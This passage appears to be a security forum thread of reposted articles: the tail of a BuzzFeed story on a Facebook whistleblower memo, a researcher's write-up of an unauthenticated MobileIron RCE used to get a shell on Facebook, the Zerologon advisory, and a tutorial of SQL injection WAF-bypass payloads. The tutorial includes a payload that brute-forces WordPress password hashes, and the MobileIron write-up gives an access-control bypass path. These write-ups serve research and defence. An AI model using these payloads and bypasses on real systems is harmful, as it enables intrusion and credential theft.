involved “dedicated employees who worked 9-6 Monday-Friday work weeks to create millions of comments” targeting members of the opposition and media reports seen as negative to Aliyev. “Perhaps they thought they were clever; the truth was, we simply didn’t care enough to stop them.” “Multiple official accounts for district-level divisions of the ruling YAP political party directly controlled numerous of these fake assets without any obfuscation whatsoever in another display of arrogance,” she wrote. “Perhaps they thought they were clever; the truth was, we simply didn’t care enough to stop them.” Katy Pearce, an associate professor at the University of Washington who studies social media and communication technology in Azerbaijan, told BuzzFeed News that fake Facebook accounts have been used to undermine the opposition and independent media in the country for years. “One of the big tools of authoritarian regimes is to humiliate the opposition in the mind of the public so that they're not viewed as a credible or legitimate alternative,” she told BuzzFeed News. “There's a chilling effect. Why would I post something if I know that I'm going to deal with thousands or hundreds of these comments, that I'm going to be targeted?” Peace said Zhang’s comment in the memo that Facebook “didn’t care enough to stop” the fake accounts and trolling aligns with her experience. “They have bigger fish to fry,” she said. A person who managed social media accounts for news organizations in Azerbaijan told BuzzFeed News that their pages were inundated with inauthentic Facebook comments. “We used to delete and ban them because we didn’t want people who came to our page to be discouraged and not react or comment,” said the person, who asked not to be named because they were not authorized to speak for their employer. “But since [the trolls] are employees, it’s easy for them to open new accounts.” They said Facebook has at times made things worse by removing the accounts or pages of human rights activists and other people after trolls report them. “We tried to tell Facebook that this is a real person who does important work,” but it took weeks for the page to be restored. Zhang wrote that a Facebook investigation into fake accounts and trolling in Azerbaijan is now underway, more than a year after she first reported the issue. On the day of her departure, she called it her “greatest unfinished business” to stop the fake behavior in the country. “Many others would think nothing of myself devoting this attention to the United States, but are shocked to see myself fighting for these small countries,” she wrote. “To put it simply, my methodologies were systematic globally, and I fought for Honduras and Azerbaijan because that was where I saw the most ongoing harm.” “I have blood on my hands” In other examples, Zhang revealed new information about a large-scale fake account network used to amplify and manipulate information about COVID-19, as well as a political influence operation that used fake accounts to influence 2018 elections in the US and Brazil. Some of these details were not previously disclosed by Facebook, suggesting the company’s regular takedown announcements remain selective and incomplete. Zhang said Facebook removed 672,000 “low-quality fake accounts” after press reports in April that some of the accounts had been engaging with COVID-19 content on the Spanish Health Ministry’s page. She said accounts in that network also engaged with content on US pages. Facebook did not disclose how many accounts it removed, or that those accounts engaged with content in other countries, including the US. Zhang also shared new details about the scale of inauthentic activity during the 2018 midterm elections in the US, and from Brazilian politicians that same year. “We ended up removing 10.5 million fake reactions and fans from high-profile politicians in Brazil and the U.S. in the 2018 elections – major politicians of all persuasions in Brazil, and a number of lower-level politicians in the United States,” she wrote. A September 2018 briefing about Facebook’s election work in the US and Brazil disclosed that it had acted against a network in Brazil that used “fake accounts to sow division and share disinformation,” as well as a set of groups, pages, and accounts that were “falsely amplifying engagement for financial gain.” It did not fully mention Zhang's findings. The scale of this activity — 672,000 fake accounts in one network, 10.5 million fake engagement and fans in others — indicates active fake accounts are a global problem, and are used to manipulate elections and public debate around the world. As one of the few people looking for and identifying fake accounts impacting civic activity outside of “priority” regions, Zhang struggled with the power she had been handed. “We focus upon harm and priority regions like the United States and Western Europe,” Zhang wrote, adding that “it became impossible to read the news and monitor world events without feeling the weight of my own responsibility.” In Bolivia, Zhang said she found “inauthentic activity supporting the opposition presidential candidate in 2019” and chose not to prioritize it. Months later, Bolivian politics fell into turmoil, leading to the resignation of President Evo Morales and “mass protests leading to dozens of deaths.” Juan Mabromata / Getty Images Members of leftist parties and Bolivian citizens watch as people burn an effigy of US President Donald Trump during a demonstration in support of Bolivia's overthrown president Evo Morales in front of the US embassy in Buenos Aires on November 22, 2019. Advertisement The same happened in Ecuador, according to Zhang, who “found inauthentic activity supporting the ruling government… and made the decision not to prioritize it.” The former Facebook employee then wondered how her decision led to downstream effects on how Ecuador’s government handled the COVID-19 pandemic — which has devastated the country — and if that would have been different if she'd acted. “I have made countless decisions in this vein – from Iraq to Indonesia, from Italy to El Salvador. Individually, the impact was likely small in each case, but the world is a vast place. Although I made the best decision I could based on the knowledge available at the time, ultimately I was the one who made the decision not to push more or prioritize further in each case, and I know that I have blood on my hands by now.” Zhang also uncovered issues in India, Facebook’s largest market, in the lead up to the local Delhi elections in February 2020. “I worked through sickness to take down a politically-sophisticated network of more than a thousand actors working to influence the election,” she wrote. Advertisement Last month, Facebook’s Indian operation came under scrutiny after reports in the Wall Street Journal revealed a top policy executive in the country had stopped local staffers from applying the company’s hate speech policies to ruling party politicians who posted anti-Muslim hate speech. “Haphazard Accidents” In her “spare time” in 2019, Zhang took on tasks usually reserved for product managers and investigators, searching out countries including Ukraine, Turkey, India, Indonesia, the Philippines, Australia, the United Kingdom, Taiwan, “and many many more.” Zhang said she found and took down “inauthentic scripted activity” in Ukraine that supported Yulia Tymoshenko, a complicated political figure who has been involved in controversial gas deals with Russia but taken a more pro-Western tack in her later career, as well as for former prime minister Volodymyr Groysman, an ally of former president Petro Poroshenko. “Volodymyr Zelensky and his faction was the only major group not affected,” she wrote. In another part of her memo, Zhang said she wanted to push back on the idea that Facebook was run by malicious people hoping to achieve a particular outcome. That was not the case, she wrote, attributing actions to “slapdash and haphazard accidents.” “Last year when we blocked users from naming the Ukraine whistleblower, we forgot to cover hashtags until I stepped in,” she wrote. Advertisement But she also remarked on Facebook’s habit of prioritizing public relations over real-world problems. “It’s an open secret within the civic integrity space that Facebook’s short-term decisions are largely motivated by PR and the potential for negative attention,” she wrote, noting that she was told directly at a 2020 summit that anything published in the New York Times or Washington Post would obtain elevated priority. “It’s why I’ve seen priorities of escalations shoot up when others start threatening to go to the press, and why I was informed by a leader in my organization that my civic work was not impactful under the rationale that if the problems were meaningful they would have attracted attention, became a press fire, and convinced the company to devote more attention to the space.” Zhang mentioned one example in February 2019, when a NATO strategic communications researcher reached out to Facebook, alerting the company that he'd "obtained" Russian inauthentic activity “on a high-profile U.S. political figure that we didn’t catch.” That researcher said they were planning on briefing Congress the next day. “I quickly investigated the case, determined what was going on, and removed the activity, dousing the immediate fire,” Zhang wrote. “Perhaps motivated by the experience, the same researcher tried the same experiment within a month or two, waiting half a year afterwards before sending the report to the press and finally causing the PR fire.” Advertisement “Human Resources Are Limited” Beyond specific examples from around the world, Zhang provided insight into the inner workings at Facebook. She criticized her team’s focus on issues related to “99% of activity that’s essentially spam.” “Overall, the focus of my organization – and most of Facebook – was on large-scale problems, an approach which fixated us on spam,” she said. “The civic aspect was discounted because of its small volume, its disproportionate impact ignored.” Zhang outlined the political processes within Facebook itself. She said the best way for her to gain attention for her work was not to go through the proper reporting channels, but to post about the issues on Facebook’s internal employee message board to build pressure. “In the office, I realized that my viewpoints weren’t respected unless I acted like an arrogant asshole.” “In the office, I realized that my viewpoints weren’t respected unless I acted like an arrogant asshole,” Zhang said. When she asked the company to do more in terms of finding and stopping malicious activity related to elections and political activity, she said she was told that “human resources are limited.” And when she was ordered to stop focusing on civic work, “I was told that Facebook would no longer have further need for my services if I refused.” Zhang was fired this month and posted her memo on her last day, even after offering to stay on through the election as an unpaid volunteer. In her goodbye, she encouraged her colleagues to remain at Facebook and to fix the company from within. “But you don’t – and shouldn’t – need to do it alone,” she wrote. “Find others who share your convictions and values to work on it together. Facebook is too big of a project for any one person to fix.” ● Sursa: https://www.buzzfeednews.com/article/craigsilverman/facebook-ignore-political-manipulation-whistleblower-memo

Da, e bun tipul asta, doar ca e cam laudaros (l-am vazut la Blackhat Asia). Si e bine de stiut ca multe lucruri le-a descoperit facand CTF-uri (atat participand cat si facand exercitii).

How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM Author: Orange Tsai This is a cross-post blog from DEVCORE. 中文版請參閱這裡 Hi, it’s a long time since my last article. This new post is about my research this March, which talks about how I found vulnerabilities on a leading Mobile Device Management product and bypassed several limitations to achieve unauthenticated RCE. All the vulnerabilities have been reported to the vendor and got fixed in June. After that, we kept monitoring large corporations to track the overall fixing progress and then found that Facebook didn’t keep up with the patch for more than 2 weeks, so we dropped a shell on Facebook and reported to their Bug Bounty program! This research is also presented at HITCON 2020. You can check the slides HERE As a Red Teamer, we are always looking for new paths to infiltrate the corporate network from outside. Just like our research in Black Hat USA last year, we demonstrated how leading SSL VPNs could be hacked and become your Virtual “Public” Network! SSL VPN is trusted to be secure and considered the only way to your private network. But, what if your trusted appliances are insecure? Based on this scenario, we would like to explore new attack surfaces on enterprise security, and we get interested in MDM, so this is the article for that! What is MDM? Mobile Device Management, also known as MDM, is an asset assessment system that makes the employees’ BYOD more manageable for enterprises. It was proposed in 2012 in response to the increasing number of tablets and mobile devices. MDM can guarantee that the devices are running under the corporate policy and in a trusted environment. Enterprise could manage assets, install certificates, deploy applications and even lock/wipe devices remotely to prevent data leakage as well. UEM (Unified Endpoint Management) is a newer term relevant to MDM which has a broader definition for managed devices. Following we use MDM to represent similar products! Our target MDM, as a centralized system, can manage and control all employees’ devices. It is undoubtedly an ideal asset assessment system for a growing company. Besides, MDM must be reachable publicly to synchronize devices all over the world. A centralized and public-exposing appliance, what could be more appealing to hackers? Therefore, we have seen hackers and APT groups abusing MDM these years! Such as phishing victims to make MDM a C&C server of their mobile devices, or even compromising the corporate exposed MDM server to push malicious Trojans to all devices. You can read the report Malicious MDM: Let’s Hide This App by Cisco Talos team and First seen in the wild - Malware uses Corporate MDM as attack vector by CheckPoint CPR team for more details! From previous cases, we know that MDM is a solid target for hackers, and we would like to do research on it. There are several MDM solutions, even famous companies such as Microsoft, IBM and Apple have their own MDM solution. Which one should we start with? We have listed known MDM solutions and scanned corresponding patterns all over the Internet. We found that the most prevalent MDMs are VMware AirWatch and MobileIron! So, why did we choose MobileIron as our target? According to their official website, more than 20,000 enterprises chose MobileIron as their MDM solution, and most of our customers are using that as well. We also know Facebook has exposed the MobileIron server since 2016. We have analyzed Fortune Global 500 as well, and found more than 15% using and exposing their MobileIron server to the public! Due to above reasons, it became our main target! Where to Start From past vulnerabilities, we learned there aren’t too many researchers diving into MobileIron. Perhaps the attack vector is still unknown. But we suspect the main reason is that the firmware is too hard to obtain. When researching an appliance, turning a pure BlackBox testing into GrayBox, or WhiteBox testing is vital. We spent lots of time searching for all kinds of information on the Internet, and ended up with an RPM package. This RPM file is supposed to be the developer’s testing package. The file is just sitting on a listable WebRoot and indexed by Google Search. Anyway, we got a file to research. The released date of the file is in early 2018. It seems a little bit old but still better than nothing! P.S. We have informed MobileIron and the sensitive files has been removed now. Finding Vulnerabilities After a painful time solving the dependency hell, we set the testing package up finally. The component is based on Java and exposed three ports: 443 - the user enrollment interface 8443 - the appliance management interface 9997 - the MobileIron device synchronization protocol (MI Protocol) All opened ports are TLS-encrypted. Apache is in the front of the web part and proxies all connections to backend, a Tomcat with Spring MVC inside. Due to the Spring MVC, it’s hard to find traditional vulnerabilities like SQL Injection or XSS from a single view. Therefore, examining the logic and architecture is our goal this time! Talking about the vulnerability, the root cause is straightforward. Tomcat exposed a Web Service that deserializes user input with Hessian format. However, this doesn’t mean we can do everything! The main effort of this article is to solve that, so please see the exploitation below. Although we know the Web Service deserializes the user input, we can not trigger it. The endpoint is located on both: User enrollment interface - https://mobileiron/mifs/services/ Management interface - https://mobileiron:8443/mics/services/ We can only touch the deserialization through the management interface because the user interface blocks the Web Service access. It’s a critical hit for us because most enterprises won’t expose their management interface to the Internet, and a management-only vulnerability is not useful to us so that we have to try harder. Scrutinizing the architecture, we found Apache blocks our access through Rewrite Rules. It looks good, right? RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L] RewriteRule ^/mifs/services [F] MobileIron relied on Apache Rewrite Rules to block all the access to Web Service. It’s in the front of a reverse-proxy architecture, and the backend is a Java-based web server. Have you recalled something? Yes, the Breaking Parser Logic! It’s the reverse proxy attack surface I proposed in 2015, and presented at Black Hat USA 2018. This technique leverage the inconsistency between the Apache and Tomcat to bypass the ACL control and reaccess the Web Service. BTW, this excellent technique is also applied to the recently F5 BIG-IP TMUI RCE vulnerability! https://mobileiron/mifs/.;/services/someService Exploiting Vulnerabilities OK, now we have access to the deserialization wherever it’s on enrollment interface or management interface. Let’s go back to exploitations! Moritz Bechler has an awesome research which summarized the Hessian deserialization vulnerability on his whitepaper, Java Unmarshaller Security. From the marshalsec source code, we learn the Hessian deserialization triggers the equals() and hashcode() while reconstructing a HashMap. It could also trigger the toString() through the XString, and the known exploit gadgets so far are: Apache XBean Caucho Resin Spring AOP ROME EqualsBean/ToStringBean In our environment, we could only trigger the Spring AOP gadget chain and get a JNDI Injection. Name Effect x Apache XBean JNDI Injection x Caucho Resin JNDI Injection √ Spring AOP JNDI Injection x ROME EqualsBean RCE Once we have a JNDI Injection, the rest parts of exploitations are easy! We can just leverage Alvaro Muñoz and Oleksandr Mirosh’s work, A Journey From JNDI/LDAP to Remote Code Execution Dream Land, from Black Hat USA 2016 to get the code execution… Is that true? Since Alvaro Muñoz and Oleksandr Mirosh introduced this on Black Hat, we could say that this technique helps countless security researchers and brings Java deserialization vulnerability into a new era. However, Java finally mitigated the last JNDI/LDAP puzzle in October 2018. After that, all java version higher than 8u181, 7u191, and 6u201 can no longer get code execution through JNDI remote URL-Class loading. Therefore, if we exploit the Hessian deserialization on the latest MobileIron, we must face this problem! Java changed the default value of com.sun.jndi.ldap.object.trustURLCodebase to False to prevent attackers from downloading remote URL-Class to get code executions. But only this has been prohibited. We can still manipulate the JNDI and redirect the Naming Reference to a local Java Class! The concept is a little bit similar to Return-Oriented Programming, utilizing a local existing Java Class to do further exploitations. You can refer to the article Exploiting JNDI Injections in Java by Michael Stepankin in early 2019 for details. It describes the attack on POST-JNDI exploitations and how to abuse the Tomcat’s BeanFactory to populate the ELProcessor gadget to get code execution. Based on this concept, researcher Welkin also provides another ParseClass gadget on Groovy. As described in his (Chinese) article: 除了 javax.el.ELProcessor，当然也还有很多其他的类符合条件可以作为 beanClass 注入到 BeanFactory 中实现利用。举个例子，如果目标机器 classpath 中有 groovy 的库，则可以结合之前 Orange 师傅发过的 Jenkins 的漏洞实现利用 It seems the Meta Programming exploitation in my previous Jenkins research could be used here as well. It makes the Meta Programming great again The approach is fantastic and looks feasible for us. But both gadgets ELProcessor and ParseClass are unavailable due to our outdated target libraries. Tomcat introduced the ELProcessor since 8.5, but our target is 7. As for the Groovy gadget, the target Groovy version is too old (1.5.6 from 2008) to support the Meta Programming, so we still have to find a new gadget by ourselves. We found a new gadget on GroovyShell in the end. If you are interested, you can check the Pull Request I sent to the JNDI-Injection-Bypass project! Attacking Facebook Now we have a perfect RCE by chaining JNDI Injection, Tomcat BeanFactory and GroovyShell. It’s time to hack Facebook! Aforementioned, we knew the Facebook uses MobileIron since 2016. Although the server’s index responses 403 Forbidden now, the Web Service is still accessible! Everything is ready and wait for our exploit! However, several days before our scheduled attack, we realized that there is a critical problem in our exploit. From our last time popping shell on Facebook, we noticed it blocks outbound connections due to security concerns. The outbound connection is vital for JNDI Injection because the idea is to make victims connecting to a malicious server to do further exploitations. But now, we can’t even make an outbound connection, not to mention others. So far, all attack surfaces on JNDI Injection have been closed, we have no choice but to return to Hessian deserialization. But due to the lack of available gadgets, we must discover a new one by ourselves! Before discovering a new gadget, we have to understand the existing gadgets’ root cause properly. After re-reading Moritz Bechler’s paper, a certain word interested me: Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception. A question quickly came up in my mind: Why did the author leave this word here? Although it failed with exceptions, there must have been something special so that the author write this down. Our target is running with a very old Groovy, so we are guessing that the readResolve() constrain might not have been applied to the code base yet! We compared the file groovy/runtime/MethodClosure.java between the latest and 1.5.6. $ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java > private Object readResolve() { > if (ALLOW_RESOLVE) { > return this; > } > throw new UnsupportedOperationException(); > } Yes, we are right. There is no ALLOW_RESOLVE in Groovy 1.5.6, and we later learned CVE-2015-3253 is just for that. It’s a mitigation for the rising Java deserialization vulnerability in 2015. Since Groovy is an internally used library, developers won’t update it if there is no emergency. The outdated Groovy could also be a good case study to demonstrated how a harmless component can leave you compromised! Of course we got the shell on Facebook in the end. Here is the video: Vulnerability Report and Patch We have done all the research on March and sent the advisory to MobileIron at 4/3. The MobileIron released the patch on 6/15 and addressed three CVEs for that. You can check the official website for details! CVE-2020-15505 - Remote Code Execution CVE-2020-15506 - Authentication Bypass CVE-2020-15507 - Arbitrary File Reading After the patch has been released, we start monitoring the Internet to track the overall fixing progress. Here we check the Last-Modified header on static files so that the result is just for your information. (Unknown stands for the server closed both 443 and 8443 ports) At the same time, we keep our attentions on Facebook as well. With 15 days no-patch confirm, we finally popped a shell and report to their Bug Bounty program at 7/2! Conclusion So far, we have demonstrated a completely unauthenticated RCE on MobileIron. From how we get the firmware, find the vulnerability, and bypass the JNDI mitigation and network limitation. There are other stories, but due to the time, we have just listed topics here for those who are interested: How to take over the employees’ devices from MDM Disassemble the MI Protocol And the CVE-2020-15506, an interesting authentication bypass I hope this article could draw attention to MDM and the importance of enterprise security! Thanks for reading. Sursa: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html

[Blog] Zerologon: instantly become domain admin by subverting Netlogon cryptography (CVE-2020-1472) Blog post 11 September 2020, by Tom Tervoort, Senior Security Specialist and Ralph Moonen, Technical Director at Secura Last month, Microsoft patched a very interesting vulnerability that would allow an attacker with a foothold on your internal network to essentially become Domain Admin with one click. All that is required is for a connection to the Domain Controller to be possible from the attacker’s viewpoint. Secura's security expert Tom Tervoort previously discovered a less severe Netlogon vulnerability last year that allowed workstations to be taken over, but the attacker required a Person-in-the-Middle (PitM) position for that to work. Now, he discovered this second, much more severe (CVSS score: 10.0) vulnerability in the protocol. By forging an authentication token for specific Netlogon functionality, he was able to call a function to set the computer password of the Domain Controller to a known value. After that, the attacker can use this new password to take control over the domain controller and steal credentials of a domain admin. The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This flaw allows attackers to impersonate any computer, including the domain controller itself, and execute remote procedure calls on their behalf. Secura urges everybody to install the patch on all their domain controllers as fast as possible. Please refer to Microsoft’s advisory. We published a test tool on Github, which you can download here: https://github.com/SecuraBV/CVE-2020-1472 that can tell you whether a domain controller is vulnerable or not. If you are interested in the technical details behind this pretty unique vulnerability and how it was discovered, download the whitepaper here. For more information about the CVE, contact Secura at info@secura.com. Read more about Zerologon: CVE-2020-1472 in our whitepaper. If you have any questions, please contact us at info@secura.com. Sursa: https://www.secura.com/blog/zero-logon

Advanced boolean-based SQLi filter bypass techniques Learn how to bypass filters and Application Firewall rules using MySQL String Functions, Regex Functions, Conditional Select and Set Variables to exploit a blind (boolean-based) SQL Injection vulnerability. This article aims to show you some techniques to exploit a SQL Injection vulnerability bypassing libinjection (running inside a Web Application Firewall). libinjection is an open-source SQL / SQLi tokenizer parser analyzer created by Nick Galbreath from Signal Sciences that aims to detect SQL Injection and XSS payloads. Libinjection runs in many Web Application Firewall because it performs better than a regular expression based ruleset. Despite this, it works well and it detects many SQLi payloads, and it can be bypassed by using specific SQL syntaxes such as MySQL string functions or conditional select. Let's take a look at the following request that tries to check if the parameter id can be injectable with SQL syntax: /index.php?id=1+AND+1=1 It is successfully identified by libInjection as SQLi attempts. You can use a list of Arithmetic Operators, String Functions and Conditional Select syntaxes to bypass it. Arithmetic operators Consider you need to check a parameter with a numeric value 2 in order to see if it's vulnerable to SQL Injection. You can make it by replacing the number 2 with an arithmetic operation. For example: OPERATOR DESCRIPTION EXAMPLE INJECTION + Addition select 1 + 1 /index.php?id=1%2b1 - Subtraction select 3 - 1 /index.php?id=3-1 * Multiplication select 2 * 1 /index.php?id=2*1 / Division select 2 / 1 /index.php?id=2/1 DIV Integer Division select 2 DIV 1 /index.php?id=2+DIV+1 String Functions libinjection intercept most of SQLi classic attempts like 1+OR+1=1 but, speaking of MySQL, it's possible to bypass its filters by using MySQL functions: INSERT: Insert substring at specified position up to n characters /index.php?id=1+OR+1=insert(1,1,1,1)-- REPEAT: Repeat a string the specified number of times index.php?id=1+OR+1=repeat(1,1)-- REPLACE: Replace occurrences of a specified string /index.php?id=1+OR+1=replace(1,1,1)-- RIGHT: Return the specified rightmost number of characters /index.php?id=1+OR+1=right(1,1)-- WEIGHT_STRING: Return the weight string for a string /index.php?id=1+OR+weight_string("foo")=weight_string("foo")-- IF statement: Implements a basic conditional construct /index.php?id=IF(1,1,1)-- Expression and Comments to Bypass As you might know, a useful technique that could help in bypassing filters is to insert comments inside the SQL syntax, such as sEleCt/*foo*/1. This kind of payload is well blocked by WAF that uses libinjection but the following syntax seems to bypass it well: {`<string>`/*comment*/(<sql syntax>)} For example, in a real scenario: curl -v 'http://wordpress/news.php?id=\{`foo`/*bar*/(select+1)\}' Following some other examples: EXAMPLE INJECTION select login from users where id={`foo`/*bar*/(select 2)}; /index.php?id={`foo`/*bar*/(select+2)} select login from users where id={`foo`/*bar*/(select--2)}; /index.php?id={`foo`/*bar*/(select--2)} select login from users where id={`foo`/*bar*/(select+2)}; /index.php?id={`foo`/*bar*/(select%2b2)} In a real scenario, if you found a boolean-based SQL Injection for example on a vulnerable WordPress plugin, and you need to bypass a WAF using libinjection to exploit it, you can bruteforce and exfiltrate the password hash of a user by using the following payload: /index.php?id={`foo`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"(^)[$].*"+limit+1)} In this case, the RLIKE operator makes me able to brute-force the hashed password value by checking the response body length after adding characters to the regular expression. For example (using any web fuzz tool): RLIKE "(^)[$].*" -> return ok (hash: $) RLIKE "(^)[$][a].*" -> error or different response body length RLIKE "(^)[$][b].*" -> error or different response body length RLIKE "(^)[$][c].*" -> return ok (hash: $c) RLIKE "(^)[$][c][a].*" -> error or different response body length RLIKE "(^)[$][c][b].*" -> error or different response body length RLIKE "(^)[$][c][c].*" -> return ok (hash: $cc) etc... Assignment Operators The := assignment operator causes the user variable on the left hand side of the operator to take on the value to its right. The value on the right hand side may be a literal value, another variable storing a value, or any legal expression that yields a scalar value, including the result of a query (provided that this value is a scalar value). You can perform multiple assignments in the same SET statement. You can perform multiple assignments in the same statement. Unlike =, the := operator is never interpreted as a comparison operator. This means you can use := in any valid SQL statement (not just in SET statements) to assign a value to a variable. We can use all syntaxes shown before (Expression, Comments, RLIKE, and Assignment Operator) too (thanks to @seedis https://github.com/seedis). For example: /index.php?id=@foo:=({`if`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"^[$]"+limit+1)})+union+%23%0a+distinctrow%0b+select+@foo This requires more explaining: select id=1 by injecting SQL query select id=2 by injecting SQL query References https://dev.mysql.com/doc/refman/8.0/en/arithmetic-functions.html https://dev.mysql.com/doc/refman/5.7/en/expressions.html https://dev.mysql.com/doc/refman/8.0/en/assignment-operators.html https://github.com/coreruleset/coreruleset/issues/1167 If you liked this post, follow me! Follow @Menin_theMiddle Follow @theMiddleBlue235 The awesome image used in this post is called "Lights Out" by spovv. theMiddle OWASP Core Rule Set Developer, Co-Founder at Rev3rse Security, I ❤️ to break application firewalls. Sursa: https://www.secjuice.com/advanced-sqli-waf-bypass/